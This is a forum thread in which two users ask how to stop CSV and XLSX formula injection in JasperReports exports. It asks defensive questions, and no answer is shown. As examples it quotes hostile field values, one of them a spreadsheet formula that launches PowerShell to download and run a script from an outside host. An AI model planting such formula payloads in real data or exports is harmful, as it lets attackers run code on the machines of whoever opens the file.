cardel Posted April 18, 2018 Share Posted April 18, 2018 Is it possible to set some properties or data filters to prevent CSV injection?I am exporting data from JSON collection to report in CSV format. Penetration test found out that there can be a problem with CSV injection.Someone can add "=cmd|' /C notepad'!'A1'" to exported field and this will cause that excel can open notepad or other scripts.Is it possible to automatically escape some special characters in fields?I tried csvExporterConfiguration.setForceFieldEnclosure(true);[/code]But with no effect. I need to escape +, -, =, @, | characters. Can I do it somehow in jasper reports or I should do this data modification before exporting report?RegardsKarel Link to comment Share on other sites More sharing options...
asookaziangmail.com Posted August 9, 2021 Share Posted August 9, 2021 Interested in any answers/guidance as well on this topic of formula injection in CSV and XLSX use cases.Reference: https://pentestmag.com/formula-injection/Is it possible to set some config/property such that the JRXlsxExporter will auto prepend a space or apostrophe in front of "=cmd***" in any textFields that are saved as such in the db tables queried by the report query?For example, assume Person.FirstName value in db table is the following:=cmd|'/Cpowershell Import-Module BitsTransfer; Start-BitsTransfer -source https://141.io/shell.ps; Invoke-Item shell.ps;'!zwhich could be a malicious download script attempt in formula field. Would it be possible to prevent such attack specifically in the fillReport() intercept or similar?This is "supposed" to solve the problem with Csv (can you provide an example? original poster says doesn't work):http://jasperreports.sourceforge.net/api/net/sf/jasperreports/export/SimpleCsvExporterConfiguration.html#setForceFieldEnclosure-java.lang.Boolean-Unfortunately, the same APIs don't exist for http://jasperreports.sourceforge.net/api/net/sf/jasperreports/export/SimpleXlsxExporterConfiguration.htmlWhy doesn't the same APIs exist for force field enclosure for XLSX? Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now